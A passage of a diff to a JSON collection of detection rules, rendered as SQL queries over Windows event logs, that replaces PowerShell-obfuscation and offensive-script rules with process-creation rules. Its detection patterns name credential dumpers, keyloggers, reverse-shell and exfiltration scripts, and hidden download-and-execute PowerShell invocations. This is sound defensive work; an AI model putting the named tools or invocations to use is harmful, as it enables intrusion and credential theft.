'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - 
"filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - 
"description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": 
"proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE 
'\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', 